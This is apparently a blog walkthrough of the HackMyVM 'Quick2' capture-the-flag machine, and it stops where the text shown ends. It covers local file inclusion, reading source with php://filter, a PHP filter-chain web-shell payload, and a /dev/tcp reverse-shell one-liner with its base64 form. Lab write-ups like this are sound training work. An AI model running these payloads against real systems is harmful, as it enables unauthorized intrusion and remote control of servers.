Hackmyvm QUICK2

Vishal

3 min readMay 1, 2024

Let’s try to solve the QUICK2 from hackmyvm.I downloaded it and opened it with Oracle Virtual Box.

The machine got the IP address of the 192.168.0.225.

Now to enumerate the open ports, used nmap, below is the output for the same.

Visited the IP in the browser, below web page is opened.

It is similar to the Quick 1 machine. Now lets visit various tabs and check the web app. The URL looks interesting http://192.168.0.225/index.php?page=home.php.

Let’s try for LFI amd try to read /etc/passwd. The application is vulnerable to LFI(Local file inclusion)

I tried various methods to convert this LFI to RCE, but unable to convert LFI to RCE. Decided to fuzz web app for files and directories on web using wfuzz. Found new page ‘page.php’.

Visit above page in browser. The page is vulnerable to LFI as title mentioned. So obivious we can read files on the system. I again tried to convert it into the RCE using log poising etc., but failed to exploit it.

Let’s use php filter to read file contents for e.g. index.php. We are able to read the file, as we use the payload php://filters/convert_base64-encode/resource, we recieved data in base64 encoded format for in http response.

After many tries, I came across this article on hacktricks. There is very good article if you are interested to read it.

Cloned the repo on my kali machine from here. Let’s first try to read phpinfo file.

Command used: python3 php_filter_chain_generator.py — chain ‘ <?php phpinfo(); ?> ‘

Its give a long output, lets open it in browser.

Now let’s generate payload to execute the code:

python3 php_filter_chain_generator.py — chain ‘ <?=`$_GET[mycmd]`?> ‘

Copied the payload and open it in burpsuite and appended ‘&mycmd=<command>’.

Let’s start the nc listener on port 9001 on kali machine and use the payload to get the reverse shell. Used the payload “sh -i >& /dev/tcp/192.168.0.135/9001 0>&1” converted it into base64 “c2ggLWkgPiYgL2Rldi90Y3AvMTkyLjE2OC4wLjEzNS85MDAxICAwPiYx”